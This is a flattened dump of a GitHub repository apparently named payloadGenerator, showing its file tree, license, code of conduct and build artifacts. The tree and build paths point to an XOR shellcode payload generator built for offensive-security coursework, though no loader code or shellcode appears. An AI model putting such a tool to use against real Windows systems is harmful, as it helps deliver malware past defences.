├── .gitignore ├── CODE_OF_CONDUCT.md ├── LICENSE ├── Payload ├── Payload.csproj ├── obj │ ├── Debug │ │ └── netcoreapp3.1 │ │ │ ├── .NETCoreApp,Version=v3.1.AssemblyAttributes.cs │ │ │ ├── apphost │ │ │ ├── xor │ │ │ ├── xor.AssemblyInfo.cs │ │ │ ├── xor.AssemblyInfoInputs.cache │ │ │ ├── xor.assets.cache │ │ │ ├── xor.csproj.CoreCompileInputs.cache │ │ │ ├── xor.csproj.FileListAbsolute.txt │ │ │ ├── xor.csprojAssemblyReference.cache │ │ │ ├── xor.dll │ │ │ ├── xor.genruntimeconfig.cache │ │ │ └── xor.pdb │ ├── Payload.csproj.nuget.dgspec.json │ ├── Payload.csproj.nuget.g.props │ ├── Payload.csproj.nuget.g.targets │ ├── Release │ │ ├── net45 │ │ │ └── win10-x64 │ │ │ │ ├── .NETFramework,Version=v4.5.AssemblyAttributes.cs │ │ │ │ ├── Payload.AssemblyInfo.cs │ │ │ │ ├── Payload.AssemblyInfoInputs.cache │ │ │ │ ├── Payload.assets.cache │ │ │ │ ├── Payload.csproj.CoreCompileInputs.cache │ │ │ │ ├── Payload.csproj.FileListAbsolute.txt │ │ │ │ ├── Payload.exe │ │ │ │ ├── Payload.exe.withSupportedRuntime.config │ │ │ │ ├── Payload.pdb │ │ │ │ ├── PublishOutputs.005b367891.txt │ │ │ │ ├── payload.AssemblyInfo.cs │ │ │ │ ├── payload.AssemblyInfoInputs.cache │ │ │ │ ├── payload.assets.cache │ │ │ │ ├── payload.csproj.CoreCompileInputs.cache │ │ │ │ ├── payload.csproj.FileListAbsolute.txt │ │ │ │ ├── payload.exe.withSupportedRuntime.config │ │ │ │ └── payload.pdb │ │ └── netcoreapp3.1 │ │ │ └── win10-x64 │ │ │ ├── .NETCoreApp,Version=v3.1.AssemblyAttributes.cs │ │ │ ├── PublishOutputs.8667dd36e7.txt │ │ │ ├── apphost.exe │ │ │ ├── xor.AssemblyInfo.cs │ │ │ ├── xor.AssemblyInfoInputs.cache │ │ │ ├── xor.assets.cache │ │ │ ├── xor.csproj.CopyComplete │ │ │ ├── xor.csproj.CoreCompileInputs.cache │ │ │ ├── xor.csproj.FileListAbsolute.txt │ │ │ ├── xor.csprojAssemblyReference.cache │ │ │ ├── xor.dll │ │ │ ├── xor.genruntimeconfig.cache │ │ │ └── xor.pdb │ ├── payload.csproj.nuget.dgspec.json │ ├── payload.csproj.nuget.g.props │ ├── payload.csproj.nuget.g.targets │ ├── project.assets.json │ ├── project.nuget.cache │ ├── xor.csproj.nuget.dgspec.json │ ├── xor.csproj.nuget.g.props │ └── xor.csproj.nuget.g.targets ├── output.shellcode └── template ├── README.md ├── generate.py └── xor ├── obj ├── Debug │ └── netcoreapp3.1 │ │ ├── .NETCoreApp,Version=v3.1.AssemblyAttributes.cs │ │ ├── apphost │ │ ├── xor │ │ ├── xor.AssemblyInfo.cs │ │ ├── xor.AssemblyInfoInputs.cache │ │ ├── xor.assets.cache │ │ ├── xor.csproj.CoreCompileInputs.cache │ │ ├── xor.csproj.FileListAbsolute.txt │ │ ├── xor.csprojAssemblyReference.cache │ │ ├── xor.dll │ │ ├── xor.genruntimeconfig.cache │ │ └── xor.pdb ├── project.assets.json ├── project.nuget.cache ├── xor.csproj.nuget.dgspec.json ├── xor.csproj.nuget.g.props └── xor.csproj.nuget.g.targets ├── template └── xor.csproj /.gitignore: -------------------------------------------------------------------------------- 1 | payload.exe 2 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | We as members, contributors, and leaders pledge to make participation in our 6 | community a harassment-free experience for everyone, regardless of age, body 7 | size, visible or invisible disability, ethnicity, sex characteristics, gender 8 | identity and expression, level of experience, education, socio-economic status, 9 | nationality, personal appearance, race, religion, or sexual identity 10 | and orientation. 11 | 12 | We pledge to act and interact in ways that contribute to an open, welcoming, 13 | diverse, inclusive, and healthy community. 14 | 15 | ## Our Standards 16 | 17 | Examples of behavior that contributes to a positive environment for our 18 | community include: 19 | 20 | * Demonstrating empathy and kindness toward other people 21 | * Being respectful of differing opinions, viewpoints, and experiences 22 | * Giving and gracefully accepting constructive feedback 23 | * Accepting responsibility and apologizing to those affected by our mistakes, 24 | and learning from the experience 25 | * Focusing on what is best not just for us as individuals, but for the 26 | overall community 27 | 28 | Examples of unacceptable behavior include: 29 | 30 | * The use of sexualized language or imagery, and sexual attention or 31 | advances of any kind 32 | * Trolling, insulting or derogatory comments, and personal or political attacks 33 | * Public or private harassment 34 | * Publishing others' private information, such as a physical or email 35 | address, without their explicit permission 36 | * Other conduct which could reasonably be considered inappropriate in a 37 | professional setting 38 | 39 | ## Enforcement Responsibilities 40 | 41 | Community leaders are responsible for clarifying and enforcing our standards of 42 | acceptable behavior and will take appropriate and fair corrective action in 43 | response to any behavior that they deem inappropriate, threatening, offensive, 44 | or harmful. 45 | 46 | Community leaders have the right and responsibility to remove, edit, or reject 47 | comments, commits, code, wiki edits, issues, and other contributions that are 48 | not aligned to this Code of Conduct, and will communicate reasons for moderation 49 | decisions when appropriate. 50 | 51 | ## Scope 52 | 53 | This Code of Conduct applies within all community spaces, and also applies when 54 | an individual is officially representing the community in public spaces. 55 | Examples of representing our community include using an official e-mail address, 56 | posting via an official social media account, or acting as an appointed 57 | representative at an online or offline event. 58 | 59 | ## Enforcement 60 | 61 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 62 | reported to the community leaders responsible for enforcement at 63 | @smokeme. 64 | All complaints will be reviewed and investigated promptly and fairly. 65 | 66 | All community leaders are obligated to respect the privacy and security of the 67 | reporter of any incident. 68 | 69 | ## Enforcement Guidelines 70 | 71 | Community leaders will follow these Community Impact Guidelines in determining 72 | the consequences for any action they deem in violation of this Code of Conduct: 73 | 74 | ### 1. Correction 75 | 76 | **Community Impact**: Use of inappropriate language or other behavior deemed 77 | unprofessional or unwelcome in the community. 78 | 79 | **Consequence**: A private, written warning from community leaders, providing 80 | clarity around the nature of the violation and an explanation of why the 81 | behavior was inappropriate. A public apology may be requested. 82 | 83 | ### 2. Warning 84 | 85 | **Community Impact**: A violation through a single incident or series 86 | of actions. 87 | 88 | **Consequence**: A warning with consequences for continued behavior. No 89 | interaction with the people involved, including unsolicited interaction with 90 | those enforcing the Code of Conduct, for a specified period of time. This 91 | includes avoiding interactions in community spaces as well as external channels 92 | like social media. Violating these terms may lead to a temporary or 93 | permanent ban. 94 | 95 | ### 3. Temporary Ban 96 | 97 | **Community Impact**: A serious violation of community standards, including 98 | sustained inappropriate behavior. 99 | 100 | **Consequence**: A temporary ban from any sort of interaction or public 101 | communication with the community for a specified period of time. No public or 102 | private interaction with the people involved, including unsolicited interaction 103 | with those enforcing the Code of Conduct, is allowed during this period. 104 | Violating these terms may lead to a permanent ban. 105 | 106 | ### 4. Permanent Ban 107 | 108 | **Community Impact**: Demonstrating a pattern of violation of community 109 | standards, including sustained inappropriate behavior, harassment of an 110 | individual, or aggression toward or disparagement of classes of individuals. 111 | 112 | **Consequence**: A permanent ban from any sort of public interaction within 113 | the community. 114 | 115 | ## Attribution 116 | 117 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], 118 | version 2.0, available at 119 | https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. 120 | 121 | Community Impact Guidelines were inspired by [Mozilla's code of conduct 122 | enforcement ladder](https://github.com/mozilla/diversity). 123 | 124 | [homepage]: https://www.contributor-covenant.org 125 | 126 | For answers to common questions about this code of conduct, see the FAQ at 127 | https://www.contributor-covenant.org/faq. Translations are available at 128 | https://www.contributor-covenant.org/translations. 129 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Fawaz Adi 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Payload/Payload.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | net45 6 | win10-x64 7 | 8 | 9 | -------------------------------------------------------------------------------- /Payload/obj/Debug/netcoreapp3.1/.NETCoreApp,Version=v3.1.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETCoreApp,Version=v3.1", FrameworkDisplayName = "")] 5 | -------------------------------------------------------------------------------- /Payload/obj/Debug/netcoreapp3.1/apphost: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Debug/netcoreapp3.1/apphost -------------------------------------------------------------------------------- /Payload/obj/Debug/netcoreapp3.1/xor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Debug/netcoreapp3.1/xor -------------------------------------------------------------------------------- /Payload/obj/Debug/netcoreapp3.1/xor.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // 5 | // Changes to this file may cause incorrect behavior and will be lost if 6 | // the code is regenerated. 7 | // 8 | //------------------------------------------------------------------------------ 9 | 10 | using System; 11 | using System.Reflection; 12 | 13 | [assembly: System.Reflection.AssemblyCompanyAttribute("xor")] 14 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")] 15 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 16 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 17 | [assembly: System.Reflection.AssemblyProductAttribute("xor")] 18 | [assembly: System.Reflection.AssemblyTitleAttribute("xor")] 19 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 20 | 21 | // Generated by the MSBuild WriteCodeFragment class. 22 | 23 | -------------------------------------------------------------------------------- /Payload/obj/Debug/netcoreapp3.1/xor.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 68ae4fd0d292246506105e0caa6b8b381329ad91 2 | -------------------------------------------------------------------------------- /Payload/obj/Debug/netcoreapp3.1/xor.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Debug/netcoreapp3.1/xor.assets.cache -------------------------------------------------------------------------------- /Payload/obj/Debug/netcoreapp3.1/xor.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | d45b5a4afd59f7be106f960fa40f9a2af02ae9d4 2 | -------------------------------------------------------------------------------- /Payload/obj/Debug/netcoreapp3.1/xor.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | /home/kali/Payloads/OSEP-Code-Snippets/xor/bin/Debug/netcoreapp3.1/xor 2 | /home/kali/Payloads/OSEP-Code-Snippets/xor/bin/Debug/netcoreapp3.1/xor.deps.json 3 | /home/kali/Payloads/OSEP-Code-Snippets/xor/bin/Debug/netcoreapp3.1/xor.runtimeconfig.json 4 | /home/kali/Payloads/OSEP-Code-Snippets/xor/bin/Debug/netcoreapp3.1/xor.runtimeconfig.dev.json 5 | /home/kali/Payloads/OSEP-Code-Snippets/xor/bin/Debug/netcoreapp3.1/xor.dll 6 | /home/kali/Payloads/OSEP-Code-Snippets/xor/bin/Debug/netcoreapp3.1/xor.pdb 7 | /home/kali/Payloads/OSEP-Code-Snippets/xor/obj/Debug/netcoreapp3.1/xor.csprojAssemblyReference.cache 8 | /home/kali/Payloads/OSEP-Code-Snippets/xor/obj/Debug/netcoreapp3.1/xor.AssemblyInfoInputs.cache 9 | /home/kali/Payloads/OSEP-Code-Snippets/xor/obj/Debug/netcoreapp3.1/xor.AssemblyInfo.cs 10 | /home/kali/Payloads/OSEP-Code-Snippets/xor/obj/Debug/netcoreapp3.1/xor.csproj.CoreCompileInputs.cache 11 | /home/kali/Payloads/OSEP-Code-Snippets/xor/obj/Debug/netcoreapp3.1/xor.dll 12 | /home/kali/Payloads/OSEP-Code-Snippets/xor/obj/Debug/netcoreapp3.1/xor.pdb 13 | /home/kali/Payloads/OSEP-Code-Snippets/xor/obj/Debug/netcoreapp3.1/xor.genruntimeconfig.cache 14 | /opt/Generator/xor/bin/Debug/netcoreapp3.1/xor 15 | /opt/Generator/xor/bin/Debug/netcoreapp3.1/xor.deps.json 16 | /opt/Generator/xor/bin/Debug/netcoreapp3.1/xor.runtimeconfig.json 17 | /opt/Generator/xor/bin/Debug/netcoreapp3.1/xor.runtimeconfig.dev.json 18 | /opt/Generator/xor/bin/Debug/netcoreapp3.1/xor.dll 19 | /opt/Generator/xor/bin/Debug/netcoreapp3.1/xor.pdb 20 | /opt/Generator/xor/obj/Debug/netcoreapp3.1/xor.csprojAssemblyReference.cache 21 | /opt/Generator/xor/obj/Debug/netcoreapp3.1/xor.AssemblyInfoInputs.cache 22 | /opt/Generator/xor/obj/Debug/netcoreapp3.1/xor.AssemblyInfo.cs 23 | /opt/Generator/xor/obj/Debug/netcoreapp3.1/xor.csproj.CoreCompileInputs.cache 24 | /opt/Generator/xor/obj/Debug/netcoreapp3.1/xor.dll 25 | /opt/Generator/xor/obj/Debug/netcoreapp3.1/xor.pdb 26 | /opt/Generator/xor/obj/Debug/netcoreapp3.1/xor.genruntimeconfig.cache 27 | -------------------------------------------------------------------------------- /Payload/obj/Debug/netcoreapp3.1/xor.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Debug/netcoreapp3.1/xor.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Payload/obj/Debug/netcoreapp3.1/xor.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Debug/netcoreapp3.1/xor.dll -------------------------------------------------------------------------------- /Payload/obj/Debug/netcoreapp3.1/xor.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | eb3d0c7d51ea2aa9aee6f06375357930deb0502a 2 | -------------------------------------------------------------------------------- /Payload/obj/Debug/netcoreapp3.1/xor.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Debug/netcoreapp3.1/xor.pdb -------------------------------------------------------------------------------- /Payload/obj/Payload.csproj.nuget.dgspec.json: -------------------------------------------------------------------------------- 1 | { 2 | "format": 1, 3 | "restore": { 4 | "/opt/Generator/Payload/Payload.csproj": {} 5 | }, 6 | "projects": { 7 | "/opt/Generator/Payload/Payload.csproj": { 8 | "version": "1.0.0", 9 | "restore": { 10 | "projectUniqueName": "/opt/Generator/Payload/Payload.csproj", 11 | "projectName": "Payload", 12 | "projectPath": "/opt/Generator/Payload/Payload.csproj", 13 | "packagesPath": "/home/kali/.nuget/packages/", 14 | "outputPath": "/opt/Generator/Payload/obj/", 15 | "projectStyle": "PackageReference", 16 | "configFilePaths": [ 17 | "/home/kali/.nuget/NuGet/NuGet.Config" 18 | ], 19 | "originalTargetFrameworks": [ 20 | "net45" 21 | ], 22 | "sources": { 23 | "https://api.nuget.org/v3/index.json": {} 24 | }, 25 | "frameworks": { 26 | "net45": { 27 | "targetAlias": "net45", 28 | "projectReferences": {} 29 | } 30 | }, 31 | "warningProperties": { 32 | "warnAsError": [ 33 | "NU1605" 34 | ] 35 | } 36 | }, 37 | "frameworks": { 38 | "net45": { 39 | "targetAlias": "net45", 40 | "dependencies": { 41 | "Microsoft.NETFramework.ReferenceAssemblies": { 42 | "suppressParent": "All", 43 | "target": "Package", 44 | "version": "[1.0.0, )", 45 | "autoReferenced": true 46 | } 47 | }, 48 | "runtimeIdentifierGraphPath": "/usr/share/dotnet/sdk/5.0.202/RuntimeIdentifierGraph.json" 49 | } 50 | }, 51 | "runtimes": { 52 | "win10-x64": { 53 | "#import": [] 54 | } 55 | } 56 | } 57 | } 58 | } -------------------------------------------------------------------------------- /Payload/obj/Payload.csproj.nuget.g.props: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | True 5 | NuGet 6 | $(MSBuildThisFileDirectory)project.assets.json 7 | /home/kali/.nuget/packages/ 8 | /home/kali/.nuget/packages/ 9 | PackageReference 10 | 5.9.1 11 | 12 | 13 | 14 | 15 | 16 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 17 | 18 | -------------------------------------------------------------------------------- /Payload/obj/Payload.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/.NETFramework,Version=v4.5.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")] 5 | -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/Payload.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // 5 | // Changes to this file may cause incorrect behavior and will be lost if 6 | // the code is regenerated. 7 | // 8 | //------------------------------------------------------------------------------ 9 | 10 | using System; 11 | using System.Reflection; 12 | 13 | [assembly: System.Reflection.AssemblyCompanyAttribute("Payload")] 14 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Release")] 15 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 16 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 17 | [assembly: System.Reflection.AssemblyProductAttribute("Payload")] 18 | [assembly: System.Reflection.AssemblyTitleAttribute("Payload")] 19 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 20 | 21 | // Generated by the MSBuild WriteCodeFragment class. 22 | 23 | -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/Payload.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 4f731be219aa69ad80850950081ccd4a866d15ba 2 | -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/Payload.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Release/net45/win10-x64/Payload.assets.cache -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/Payload.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | e20a7e50690a54e9c88adca9f8be5b58cfa9c040 2 | -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/Payload.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | /opt/Generator/Payload/bin/Release/net45/win10-x64/Payload.exe.config 2 | /opt/Generator/Payload/bin/Release/net45/win10-x64/Payload.exe 3 | /opt/Generator/Payload/bin/Release/net45/win10-x64/Payload.pdb 4 | /opt/Generator/Payload/obj/Release/net45/win10-x64/Payload.AssemblyInfoInputs.cache 5 | /opt/Generator/Payload/obj/Release/net45/win10-x64/Payload.AssemblyInfo.cs 6 | /opt/Generator/Payload/obj/Release/net45/win10-x64/Payload.csproj.CoreCompileInputs.cache 7 | /opt/Generator/Payload/obj/Release/net45/win10-x64/Payload.exe 8 | /opt/Generator/Payload/obj/Release/net45/win10-x64/Payload.pdb 9 | -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/Payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Release/net45/win10-x64/Payload.exe -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/Payload.exe.withSupportedRuntime.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/Payload.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Release/net45/win10-x64/Payload.pdb -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/PublishOutputs.005b367891.txt: -------------------------------------------------------------------------------- 1 | /opt/Generator/Payload/bin/Release/net45/win10-x64/publish/Payload.exe 2 | /opt/Generator/Payload/bin/Release/net45/win10-x64/publish/Payload.exe.config 3 | /opt/Generator/Payload/bin/Release/net45/win10-x64/publish/Payload.pdb 4 | -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/payload.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // 5 | // Changes to this file may cause incorrect behavior and will be lost if 6 | // the code is regenerated. 7 | // 8 | //------------------------------------------------------------------------------ 9 | 10 | using System; 11 | using System.Reflection; 12 | 13 | [assembly: System.Reflection.AssemblyCompanyAttribute("payload")] 14 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Release")] 15 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 16 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 17 | [assembly: System.Reflection.AssemblyProductAttribute("payload")] 18 | [assembly: System.Reflection.AssemblyTitleAttribute("payload")] 19 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 20 | 21 | // Generated by the MSBuild WriteCodeFragment class. 22 | 23 | -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/payload.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 68e8076dcdc7c81ee84111533eea4a2fe0b1b689 2 | -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/payload.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Release/net45/win10-x64/payload.assets.cache -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/payload.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | e20a7e50690a54e9c88adca9f8be5b58cfa9c040 2 | -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/payload.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | /opt/Generator/Payload/bin/Release/net45/win10-x64/payload.exe.config 2 | /opt/Generator/Payload/bin/Release/net45/win10-x64/payload.exe 3 | /opt/Generator/Payload/bin/Release/net45/win10-x64/payload.pdb 4 | /opt/Generator/Payload/obj/Release/net45/win10-x64/payload.AssemblyInfoInputs.cache 5 | /opt/Generator/Payload/obj/Release/net45/win10-x64/payload.AssemblyInfo.cs 6 | /opt/Generator/Payload/obj/Release/net45/win10-x64/payload.csproj.CoreCompileInputs.cache 7 | /opt/Generator/Payload/obj/Release/net45/win10-x64/payload.exe 8 | /opt/Generator/Payload/obj/Release/net45/win10-x64/payload.pdb 9 | -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/payload.exe.withSupportedRuntime.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Payload/obj/Release/net45/win10-x64/payload.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/payloadGenerator/0dfb54d0d756c6f5163b57081b2ea72016517dce/Payload/obj/Release/net45/win10-x64/payload.pdb -------------------------------------------------------------------------------- /Payload/obj/Release/netcoreapp3.1/win10-x64/.NETCoreApp,Version=v3.1.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETCoreApp,Version=v3.1", FrameworkDisplayName = "")] 5 | -------------------------------------------------------------------------------- /Payload/obj/Release/netcoreapp3.1/win10-x64/PublishOutputs.8667dd36e7.txt: -------------------------------------------------------------------------------- 1 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/xor.exe 2 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/xor.dll 3 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/xor.deps.json 4 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/xor.runtimeconfig.json 5 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/xor.pdb 6 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/Microsoft.CSharp.dll 7 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/Microsoft.VisualBasic.Core.dll 8 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/Microsoft.VisualBasic.dll 9 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/Microsoft.Win32.Primitives.dll 10 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/Microsoft.Win32.Registry.dll 11 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.AppContext.dll 12 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Buffers.dll 13 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Collections.Concurrent.dll 14 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Collections.Immutable.dll 15 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Collections.NonGeneric.dll 16 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Collections.Specialized.dll 17 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Collections.dll 18 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.ComponentModel.Annotations.dll 19 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.ComponentModel.DataAnnotations.dll 20 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.ComponentModel.EventBasedAsync.dll 21 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.ComponentModel.Primitives.dll 22 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.ComponentModel.TypeConverter.dll 23 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.ComponentModel.dll 24 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Configuration.dll 25 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Console.dll 26 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Core.dll 27 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Data.Common.dll 28 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Data.DataSetExtensions.dll 29 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Data.dll 30 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Diagnostics.Contracts.dll 31 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Diagnostics.Debug.dll 32 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Diagnostics.DiagnosticSource.dll 33 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Diagnostics.FileVersionInfo.dll 34 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Diagnostics.Process.dll 35 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Diagnostics.StackTrace.dll 36 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Diagnostics.TextWriterTraceListener.dll 37 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Diagnostics.Tools.dll 38 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Diagnostics.TraceSource.dll 39 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Diagnostics.Tracing.dll 40 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Drawing.Primitives.dll 41 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Drawing.dll 42 | /opt/Generator/Payload/bin/Release/netcoreapp3.1/win10-x64/publish/System.Dynamic.Runtime.dll 43 | 